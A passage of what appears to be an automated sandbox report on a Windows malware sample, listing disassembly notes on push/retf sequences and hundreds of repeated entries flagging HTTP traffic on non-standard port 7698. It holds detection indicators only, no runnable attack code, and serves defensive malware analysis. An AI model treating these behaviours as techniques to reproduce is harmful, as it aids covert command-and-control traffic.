Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC2310 push rbp; retf	0_2_03AC231B
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC2360 push r14; retf	0_2_03AC236B
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC2358 push r14; retf	0_2_03AC236B

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 7698
